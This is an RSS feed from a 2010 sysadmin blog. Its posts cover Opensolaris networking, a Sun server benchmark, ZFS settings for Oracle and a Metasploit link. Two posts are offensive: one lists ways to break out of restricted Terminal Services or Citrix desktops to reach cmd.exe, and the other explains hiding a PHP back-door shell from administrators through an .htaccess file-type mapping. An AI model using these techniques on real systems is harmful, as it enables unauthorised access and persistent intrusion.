<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Sysit&#039;s Blog</title>
	<atom:link href="http://sysit.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://sysit.wordpress.com</link>
	<description>Just another WordPress.com site</description>
	<lastBuildDate>Thu, 17 Feb 2011 00:42:03 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='sysit.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Sysit&#039;s Blog</title>
		<link>http://sysit.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://sysit.wordpress.com/osd.xml" title="Sysit&#039;s Blog" />
	<atom:link rel='hub' href='http://sysit.wordpress.com/?pushpress=hub'/>
		<item>
		<title>List of Hacks for TS and Citrix</title>
		<link>http://sysit.wordpress.com/2010/09/23/list-of-hacks-for-ts-and-citrix/</link>
		<comments>http://sysit.wordpress.com/2010/09/23/list-of-hacks-for-ts-and-citrix/#comments</comments>
		<pubDate>Thu, 23 Sep 2010 12:29:21 +0000</pubDate>
		<dc:creator>sysit</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://sysit.wordpress.com/?p=44</guid>
		<description><![CDATA[Basic shortcuts: Open file: Ctrl + o Save File: Ctrl + s Open New Browser: Ctrl + n, Shift (or Ctrl) + Left Click on link Browser History: Ctrl + h Task Manager: Ctrl+Shift+Esc File manager: Windows + E Run &#8230; <a href="http://sysit.wordpress.com/2010/09/23/list-of-hacks-for-ts-and-citrix/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=44&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Basic shortcuts:</p>
<ul>
<li>Open file: Ctrl + o</li>
<li>Save File: Ctrl + s</li>
<li>Open New Browser: Ctrl + n, Shift (or Ctrl) + Left Click on link</li>
<li>Browser History: Ctrl + h</li>
<li>Task Manager: Ctrl+Shift+Esc</li>
<li>File manager: Windows + E</li>
<li>Run commands: Windows + R</li>
<li>Utility Manager: Windows + U</li>
<li>Windows search: Windows + F</li>
</ul>
<p>Open Internet browser:</p>
<ul>
<li>Press F1 – Click on any URL to open.</li>
<li>Click on help on the language bar.</li>
<li>Windows + U -&gt; Help</li>
</ul>
<p>Get local files (like cmd.exe):</p>
<ul>
<li>Printing window (Ctrl + p) -&gt; print to file -&gt; filename=* -&gt; Enter -&gt; and browse to system32</li>
<li>Right Mouse Click (or Shift + F10) -&gt; Save Picture As -&gt; filename=* -&gt;…</li>
<li>View Source -&gt; filename=* -&gt;…</li>
</ul>
<p>If the right mouse click is forbidden:</p>
<ul>
<li>Use Shift + F10</li>
</ul>
<p>Run Command Shell:</p>
<ul>
<li>Run command.com</li>
<li>Drag other file on cmd.exe or command.com</li>
<li>Shortcut to cmd.exe or command.com</li>
<li>Batch file with: c:\windows\system32\cmd /c (Or /K) any_command</li>
<li>VBS script:</li>
<p>Dim pav<br />
ShellSet pavShell= WScript.CreateObject (&#8220;WScript.shell&#8221;)<br />
oShell.run &#8220;cmd /K CD C:\ &amp; Dir&#8221;<br />
Set pavShell= Nothing</ul>
<p>Open file manager using IE:</p>
<ul>
<li>Favorites -&gt; Drag any folder to browser’s window.</li>
</ul>
<p>Using office applications:</p>
<ul>
<li>Insert Picture -&gt; filename=* -&gt;…</li>
<li>Insert Hyper Link &#8211; &gt; file://c:\windows\system32\cmd.exe</li>
<li>Insert object -&gt; Create from File -&gt; cmd.exe or command.com</li>
<li>Run VB (or VB Macro).</li>
</ul>
<p>If you can&#8217;t run shell:</p>
<ul>
<li>Rename cmd.exe (or command.com) to applicationName_uCanRun.exe.</li>
<li>Use Debug.exe, using this you can run almost any exe you like. You just need to upload the Assembly code or write by yourself.</li>
<li>Run VB compiler, using office applications</li>
</ul>
<p> Technique for opening cmd if you have access to MSPaint :<br />
1) Open MSPaint and change image attributes to: Width=6 and Height=1 pixels.<br />
2) Set pixels values to (from left to right):<br />
1st: R: 10, G: 0, B: 0<br />
2nd: R: 13, G: 10, B: 13<br />
3rd: R: 100, G: 109, B: 99<br />
4th: R: 120, G: 101, B: 46<br />
5th: R: 0, G: 0, B: 101<br />
6th: R: 0, G: 0, B: 0<br />
3) Save it as 24-bit Bitmap (*.bmp;*.dib)<br />
4) Change it&#8217;s extension from bmp to bat and run.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sysit.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sysit.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sysit.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sysit.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sysit.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sysit.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sysit.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sysit.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sysit.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sysit.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sysit.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sysit.wordpress.com/44/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sysit.wordpress.com/44/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sysit.wordpress.com/44/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=44&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sysit.wordpress.com/2010/09/23/list-of-hacks-for-ts-and-citrix/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08bf265d2e85cfbfa42ad9f4f15c1b79?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sysit</media:title>
		</media:content>
	</item>
		<item>
		<title>Metasploit running on iPhone</title>
		<link>http://sysit.wordpress.com/2010/09/23/metasploit-running-on-iphone/</link>
		<comments>http://sysit.wordpress.com/2010/09/23/metasploit-running-on-iphone/#comments</comments>
		<pubDate>Thu, 23 Sep 2010 12:02:38 +0000</pubDate>
		<dc:creator>sysit</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://sysit.wordpress.com/?p=41</guid>
		<description><![CDATA[Check this out, Metasploit the ultimate all penetration and hacking tool has been updated and now can be run from your iPhone &#8211; which turns your iPhone into a nice hacking tool For more information about how to install and run it , &#8230; <a href="http://sysit.wordpress.com/2010/09/23/metasploit-running-on-iphone/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=41&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Check this out, <a href="http://www.metasploit.com/">Metasploit </a>the ultimate all penetration and hacking tool has been updated and now can be run from your iPhone &#8211; which turns your iPhone into a nice hacking tool<br />
For more information about how to install and run it , check the following link<br />
<a href="http://www.offensive-security.com/offsec/metasploit-3-4-and-set-on-iphone-4/">http://www.offensive-security.com/offsec/metasploit-3-4-and-set-on-iphone-4/</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sysit.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sysit.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sysit.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sysit.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sysit.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sysit.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sysit.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sysit.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sysit.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sysit.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sysit.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sysit.wordpress.com/41/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sysit.wordpress.com/41/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sysit.wordpress.com/41/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=41&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sysit.wordpress.com/2010/09/23/metasploit-running-on-iphone/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08bf265d2e85cfbfa42ad9f4f15c1b79?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sysit</media:title>
		</media:content>
	</item>
		<item>
		<title>Networking Setup in Opensolaris</title>
		<link>http://sysit.wordpress.com/2010/07/22/networking-setup-in-opensolaris/</link>
		<comments>http://sysit.wordpress.com/2010/07/22/networking-setup-in-opensolaris/#comments</comments>
		<pubDate>Thu, 22 Jul 2010 08:26:52 +0000</pubDate>
		<dc:creator>sysit</dc:creator>
				<category><![CDATA[Opensolaris]]></category>

		<guid isPermaLink="false">http://sysit.wordpress.com/?p=23</guid>
		<description><![CDATA[How to setup networking on an opensolaris server. <a href="http://sysit.wordpress.com/2010/07/22/networking-setup-in-opensolaris/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=23&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>######################################<br />
# Network Config<br />
######################################<br />
###### DHCP Disable<br />
# rm /etc/dhcp.XXX if exists<br />
svcadm disable nwam<br />
svcadm enable -r network/physical:default</p>
<p>###### IP Address Setup<br />
# ifconfig -a to see network detail<br />
# dladm show-link to see what interfaces are available<br />
# Create trunk 1 (If interface are in use then &#8220;ifconfig ce0 down&#8221;)<br />
dladm create-aggr -d ce0 -d ce1 -d ce2 -d ce3 1<br />
# Setup LACP Network trunk<br />
dladm modify-aggr -P L2 1<br />
dladm modify-aggr -L active -T short 1<br />
ifconfig aggr1 plumb 10.0.0.10 netmask 255.255.255.0 up</p>
<p>#Configure files<br />
echo 10.0.0.10 &gt; /etc/hostname.aggr1<br />
echo sol02 &gt; /etc/nodename<br />
cp /etc/inet/hosts /etc/inet/hosts.org<br />
echo &#8220;::1 localhost&#8221; sol02 &gt; /etc/inet/hosts<br />
echo 127.0.0.1 localhost loghost  &gt;&gt; /etc/inet/hosts<br />
echo 10.0.0.10  sol02 sol02.home.dom &gt;&gt; /etc/inet/hosts<br />
echo 10.0.0.20  esx01 &gt;&gt; /etc/inet/hosts<br />
echo 10.0.0.0 255.255.255.0 &gt;&gt; /etc/inet/netmasks<br />
echo 10.0.0.1 &gt; /etc/defaultrouter</p>
<p># vi /etc/resolv.conf and check it is correct i.e hosts file dns included</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sysit.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sysit.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sysit.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sysit.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sysit.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sysit.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sysit.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sysit.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sysit.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sysit.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sysit.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sysit.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sysit.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sysit.wordpress.com/23/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=23&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sysit.wordpress.com/2010/07/22/networking-setup-in-opensolaris/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08bf265d2e85cfbfa42ad9f4f15c1b79?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sysit</media:title>
		</media:content>
	</item>
		<item>
		<title>How to hide your back-door shell in Apache</title>
		<link>http://sysit.wordpress.com/2010/07/20/how-to-hide-your-back-door-shell-in-apache/</link>
		<comments>http://sysit.wordpress.com/2010/07/20/how-to-hide-your-back-door-shell-in-apache/#comments</comments>
		<pubDate>Tue, 20 Jul 2010 12:21:07 +0000</pubDate>
		<dc:creator>sysit</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://sysit.wordpress.com/?p=21</guid>
		<description><![CDATA[When adding a back-door shell in web server one of the most important things is to hide the shell as good as possible from evil Sysadmins When Sysadmins searching for suspicious files they usually will search for .php , .phtml &#8230; <a href="http://sysit.wordpress.com/2010/07/20/how-to-hide-your-back-door-shell-in-apache/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=21&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>When adding a back-door shell in web server one of the most important things is to hide the shell as good as possible from evil Sysadmins</p>
<p>When Sysadmins searching for suspicious files they usually will search for .php , .phtml , cgi , pl …. but file like .jpg or gif usually will be discarded because they are no executable . So it is a good candidate to hide our little shell back-door , but you will say that if we will rename our script to jpg you will need to use include !!! but it is not exactly Wright , to make Apache accept any file as .php will help us .htaccess</p>
<p>1.create .htaccess file in the webserver directory in the file you need to specify your script name for example : AddType application/x-web-php.jpg with this method you can change your php code to any file extension .txt .lol</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sysit.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sysit.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sysit.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sysit.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sysit.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sysit.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sysit.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sysit.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sysit.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sysit.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sysit.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sysit.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sysit.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sysit.wordpress.com/21/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=21&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sysit.wordpress.com/2010/07/20/how-to-hide-your-back-door-shell-in-apache/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08bf265d2e85cfbfa42ad9f4f15c1b79?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sysit</media:title>
		</media:content>
	</item>
		<item>
		<title>Sun M5000 Benchmark</title>
		<link>http://sysit.wordpress.com/2010/07/14/16/</link>
		<comments>http://sysit.wordpress.com/2010/07/14/16/#comments</comments>
		<pubDate>Wed, 14 Jul 2010 12:46:55 +0000</pubDate>
		<dc:creator>sysit</dc:creator>
				<category><![CDATA[Hardware]]></category>

		<guid isPermaLink="false">http://sysit.wordpress.com/?p=16</guid>
		<description><![CDATA[PeopleSoft Payroll 500K Employees on Sun SPARC Enterprise M5000 World Record Oracle&#8217;s Sun SPARC Enterprise M5000 server combined with Oracle&#8217;sSun Storage F5100 Flash Array system has producedWorld Record Performance on PeopleSoft Payroll 9.0(North American) 500K employees benchmark. The Sun SPARC Enterprise M5000 server and &#8230; <a href="http://sysit.wordpress.com/2010/07/14/16/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=16&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>PeopleSoft Payroll 500K Employees on Sun SPARC Enterprise M5000 World Record</p>
<div id="content">
<div id="innercontent">
<div id="peoplesoft_payroll_500k_employees_on" class="entry">
<div class="entry-content">Oracle&#8217;s Sun SPARC Enterprise M5000 server combined with Oracle&#8217;sSun Storage F5100 Flash Array system has producedWorld Record Performance on PeopleSoft Payroll 9.0(North American) 500K employees benchmark.</div>
<ul>
<li>The Sun SPARC Enterprise M5000 server and the Sun Storage F5100 Flash Array system processed payroll for 500K employees using 32 payroll threads 18% faster than the IBM z10 EC 2097-709mainframe as measured for payroll processing tasks in the Peoplesoft Payroll 9.0 (North American) benchmark.This IBM mainframe is rated at 6,512 MIPS.</li>
<li>The IBM z10 mainframe with nine 4.4 GHz Gen1 processors has a list price over $6M.</li>
<li>The Sun SPARC Enterprise M5000 server together with the Sun Storage F5100 Flash Array system processed payroll for 500K employees using 32 payroll threads 92% faster than an HP rx7640 as measured for payroll processing tasks in the Peoplesoft Payroll 9.0 (North American) benchmark.</li>
<li>The Sun Storage F5100 Flash Array system is a high performance, high density solid state flash array which provides a read latency of only 0.5 msec which is about 10 times faster than the normal disk latencies 5 msec measured on this benchmark.</li>
<li>The Sun SPARC Enterprise M5000 server used the Oracle Solaris 10 operating system and ran with the Oracle 11gR1 database for this benchmark.</li>
</ul>
<h3>Performance Landscape</h3>
<h4>500K Employees</h4>
<table border="1" cellpadding="2" width="100%">
<tbody>
<tr bgcolor="#eeeeee">
<th rowspan="2">System</th>
<th rowspan="2">Processor</th>
<th rowspan="2">OS/Database</th>
<th colspan="4">Time in Minutes</th>
<th rowspan="2">Num of<br />
Streams</th>
</tr>
<tr bgcolor="#eeeeee">
<th>Payroll<br />
Processing<br />
Result</th>
<th>Run 1</th>
<th>Run 2</th>
<th>Run 3</th>
</tr>
<tr>
<td>Sun M5000</td>
<td>8x 2.53GHz SPARC64 VII</td>
<td>Solaris/Oracle 11g</td>
<td align="center">50.11</td>
<td align="center">73.88</td>
<td align="center">534.20</td>
<td align="center">1267.06</td>
<td align="center">32</td>
</tr>
<tr>
<td>IBM z10</td>
<td>9x 4.4GHz Gen1, 6,512 MIPS</td>
<td>Z/OS /DB2</td>
<td align="center">58.96</td>
<td align="center">80.5</td>
<td align="center">250.68</td>
<td align="center">462.6</td>
<td align="center">8</td>
</tr>
<tr>
<td>HP rx7640</td>
<td>8x 1.6GHz Itanium2</td>
<td>HP-UX/Oracle 11g</td>
<td align="center">96.17</td>
<td align="center">133.63</td>
<td align="center">712.72</td>
<td align="center">1665.01</td>
<td align="center">32</td>
</tr>
</tbody>
</table>
<p>Times under all Run columns above represent Payroll processing and<br />
Post-processing elapsed times and furthermore:</p>
<ul>
<li>Run 1 = 32 parallel job streams &amp; Single Check option = &#8220;No&#8221;</li>
<li>Run 2 = 32 sequential jobs for Pay Calculation process &amp; 32 parallel<br />
job streams for the rest. Single Check option = &#8220;Yes&#8221;</li>
</ul>
</div>
<li>Run 3 = One job stream &amp; Single Check option = &#8220;Yes&#8221;</li>
<p>Times under Result column represents Payroll processing only.</p>
<h3>Results and Configuration Summary</h3>
<p>Hardware Configuration:</p>
<p>1 x Sun SPARC Enterprise M5000 (8 x 2.53 GHz/64 GB)</p>
</div>
<p>1 x Sun Storage F5100 Flash Array (40 x 24 GB FMODs)</p>
<p>1 x StorageTek 2510 (4 x 136 GB SAS 15K RPM)</p>
<p>4 x Dual-Port SAS Fibre Channel Host Bus Adapters (HBA)Software Configuration:</p>
<ul>Oracle Solaris 10 10/09</ul>
<p>Oracle PeopleSoft HCM and Campus Solutions 9.00.00.311 64-bit</p>
<p>Oracle PeopleSoft Enterprise (PeopleTools) 8.49.25 64-bit</p>
<p>Oracle 11g R1 11.1.0.7 64-bit</p>
<p>Micro Focus COBOL Server Express 4.0 SP4 64-bit</p>
<h3>Benchmark Description</h3>
<p>The PeopleSoft 9.0 Payroll (North America) benchmark is a performance benchmark established by PeopleSoft to demonstrate system performance for a range of processing volumes in a specific configuration. This information may be used to determine the software, hardware, and<br />
network configurations necessary to support processing volumes. This workload represents large batch runs typical of OLTP workloads during a mass update.</p>
<p>To measure five application business process run times for a database representing large organization. The five processes are:</p>
<ul>
<li>Paysheet Creation: generates payroll data worksheet for employees,<br />
consisting of std payroll information for each employee for given pay<br />
cycle.</li>
<li>Payroll Calculation: Looks at Paysheets and calculates checks for those<br />
employees.</li>
<li>Payroll Confirmation: Takes information generated by Payroll<br />
Calculation and updates the employees&#8217; balances with the calculated<br />
amounts.</li>
<li>Print Advice forms: The process takes the information generated by<br />
payroll Calculations and Confirmation and produces an Advice for each<br />
employee to report Earnings, Taxes, Deduction, etc.</li>
<li>Create Direct Deposit File: The process takes information generated by<br />
above processes and produces an electronic transmittal file use to<br />
transfer payroll funds directly into an employee bank a/c.</li>
</ul>
<p>For the benchmark, we collect at least three data points with different number of job streams (parallel jobs). This batch benchmark allows a maximum of thirty-two job streams to be configured to run in parallel.</p>
<h3>Disclosure Statement</h3>
<p>Oracle PeopleSoft Payroll 9.0 benchmark, Sun SPARC Enterprise M5000<br />
(8 2.53GHz SPARC64 VII) 50.11 min,<br />
IBM z10 (9 gen1) 58.96 min, HP rx7640 (8 1.6GHz Itanium2)<br />
96.17 min<br />
<!-- end .innersidebar --></p>
</div>
<p><!-- end .sidebar-b --></p>
<p><!-- end #innersidebars --></p>
<p><!-- end #sidebars --></p>
<p><!-- end #innerpagewrap --></p>
<p><!-- end #pagewrap --></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sysit.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sysit.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sysit.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sysit.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sysit.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sysit.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sysit.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sysit.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sysit.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sysit.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sysit.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sysit.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sysit.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sysit.wordpress.com/16/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=16&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sysit.wordpress.com/2010/07/14/16/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08bf265d2e85cfbfa42ad9f4f15c1b79?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sysit</media:title>
		</media:content>
	</item>
		<item>
		<title>ZFS configuration for Oracle DB</title>
		<link>http://sysit.wordpress.com/2010/07/14/zfs-configuration-for-oracle-db/</link>
		<comments>http://sysit.wordpress.com/2010/07/14/zfs-configuration-for-oracle-db/#comments</comments>
		<pubDate>Wed, 14 Jul 2010 11:53:49 +0000</pubDate>
		<dc:creator>sysit</dc:creator>
				<category><![CDATA[ZFS]]></category>

		<guid isPermaLink="false">http://sysit.wordpress.com/?p=10</guid>
		<description><![CDATA[  ZFS file system is Officially supported by Oracle from Database version 10gR2 10.2.0.3 and higher , Oracle supports just single instance on ZFS ,no RAC support currently . For good Oracle OLTP performance the zfs record size should match &#8230; <a href="http://sysit.wordpress.com/2010/07/14/zfs-configuration-for-oracle-db/">Continue reading <span class="meta-nav">&#8594;</span></a><img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sysit.wordpress.com&amp;blog=14606897&amp;post=10&amp;subd=sysit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p> </p>
<p>ZFS file system is Officially supported by Oracle from Database version 10gR2 10.2.0.3 and higher , Oracle supports just single instance on ZFS ,no RAC support currently .</p>
<p>For good Oracle OLTP performance the zfs record size should match Oracle db block size</p>
<p>ZFS mirrored pool or hardware raid is preferable over Raidz pool</p>
<p>ZFS pools for oracle should be at list 3 separate pools</p>
<p>Database pool for Oracle tables , index , undo and temp data</p>
<p>Redo Log pool and a separate zfs log device</p>
<p>Archive log pool – from low end storage</p>
<p>If the database is with high modification activity you should consider separating temp tables from Database pool.</p>
<p>You should consider disabling Oracle checksums because ZFS is doing it too:Alter system set db_block_checksum=OFF scope=both;</p>
<p>Now for the record size for the zfs pools , the Database pool 8KB recordsize and default primarycache value , temp poool default recordsize and default primarycache valu , Redo logs pool default recordsize and default primarycache valu , Archive log pool enable compression default recordsize and primarycache metadata.</p>
<p>You should separate zfs log devices for redo logs &#8211; the zfs write speed is heavily dependent on the speed of the log devices , the log devices should be pleased on SSD or NVRAM</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sysit.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sysit.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sysit.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sysit.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sysit.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sysit.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sysit.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sysit.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sysit.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sysit.wordpress.com/10/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sysit.wordpress.com/10/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sysit.wordpress.com/10/" /></a> <a rel="nofollow" 